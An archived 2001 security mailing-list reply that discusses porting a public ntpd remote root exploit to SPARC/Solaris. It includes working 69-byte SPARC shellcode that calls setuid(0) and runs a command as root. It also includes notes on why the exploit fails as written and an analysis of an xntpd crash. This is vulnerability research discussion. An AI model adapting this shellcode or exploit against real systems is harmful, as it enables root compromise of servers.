OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Alexander Gall (gallSWITCH.CH)
Date: Fri Apr 06 2001 - 06:27:20 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    > On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
    > > Przemyslaw Frasunek wrote:
    > > >
    > > > /* ntpd remote root exploit / babcia padlina ltd. <venglinfreebsd.lublin.pl> */
    > >
    > > Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
    > > the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
    > >
    > > More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
    > > caused it to seg. fault and core. No time to double-check if that is actually
    > > exploitable at this moment. How many NTP distributions are based off of the
    > > vulnerable code? With the small payload, gaining access might be hard, but
    > > the potential for DoS looks pretty easy.
    >
    > We've taken a peek at getting sparc shellcode working with this. Getting
    > it in below the 70 byte buffer size is tricky.
    >
    > Does anybody out there have working shellcode for this that can do *anything*
    > to the state of the system even if it doesnt lead to full sploit? (beyond
    > making ntp core of course ;) )

    Well, here is a shellcode that is 69 bytes large and execs
    '/bin/touch /tmp/test' as root (if called from a setuid root program)

    char shellcode[]=
    "\x90\x10\x20\x00" /* mov 0, %o0 */
    "\x82\x10\x20\x17" /* mov 23, %g1 */
    "\x91\xd0\x20\x08" /* ta 8 -> setuid(0) */
    "\x30\x80\x00\x07" /* ba,a bounce */
    "\x90\x03\xe0\x08" /* start: add %o7, 8, %o0 */
    "\x92\x03\xa0\x40" /* add %sp, 64, %o1 */
    "\xd0\x22\x40\x00" /* st %o0, [%o1] */
    "\xc0\x22\x60\x04" /* st %g0, [%o1+4] */
    "\x82\x10\x20\x0b" /* mov 11, %g1 */
    "\x91\xd0\x20\x08" /* ta 8 -> exec() */
    "\x7f\xff\xff\xfa" /* bounce: call start */
    "\x01\x00\x00\x00" /* nop */
    "/bin/touch /tmp/test";

    I don't know if you are aware of this, but simply replacing the shellcode in
    the exploit won't work because of the differing layout of a stack frame on
    SPARC.

    I have also verified that xntpd 3.4y crashes on Solaris 8 with SIGSEGV.
    However, when I looked at the core dump I had the impression that this is
    *not* due to a buffer overflow because I couldn't find any of the symptoms
    that I would expect in such a case (jump to never-never land because the
    overwritten return address on the stack is garbage, %l and %i registers
    filled with data from the buffer). I didn't look too hard though, so I may
    be wrong.

    Alex.

     ___________ SWITCH - The Swiss Academic and Research Network ___________
     Alexander Gall, SWITCH, Limmatquai 138, CH-8001 Zurich, Switzerland
     gallswitch.ch Tel: +41 1 268 1522 Fax: +41 1 268 1568